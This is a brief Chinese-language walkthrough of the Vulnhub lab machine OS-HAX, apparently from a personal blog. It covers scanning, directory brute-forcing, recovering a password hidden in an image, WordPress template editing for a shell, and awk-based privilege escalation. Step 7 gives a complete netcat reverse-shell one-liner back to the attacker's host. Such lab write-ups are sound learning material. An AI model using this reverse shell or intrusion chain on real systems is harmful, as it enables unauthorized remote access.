前言
- Vulnhub刷题简单记录
OS-HAX
描述
难度:中级
标志:引导根
学习:利用 | 网络应用安全| 权限提升
OS-HAX开始
1、可以用两种方法确认靶场的存在,扫ip
1 | netdiscover -i eth0 -r 192.168.1.0/24 |
2、扫目标端口开发情况
1 | nmap -sV -sC -A 192.168.1.108 |
3、访问主页,根据提示说有一个password_resets,我们扫一下目录情况
1 | gobuster dir -u http://192.168.1.104/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 |
4、通过String查看img中的flaghost的图片,获取一个密码的信息passw@45
5、也可以用exiftool 来查看图片信息
6、接着猜测他是目录,发现了brainfuck加密,接着去解密http://192.168.1.102/passw@45/flag2.txt
1 | i+++++ +++++ [->++ +++++ +++<] >++++ +++++ +++++ +++++ .<+++ +[->- ---<] |
7、利用获取的账号和密码登陆wordpress后台改模板拿shell
7、用下面命令反弹shell
1 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.104 1234 >/tmp/f |
8、提权看下面截图,就是利用web的权限,执行awk命令来获取root权限
我的个人博客
孤桜懶契:http://gylq.gitee.io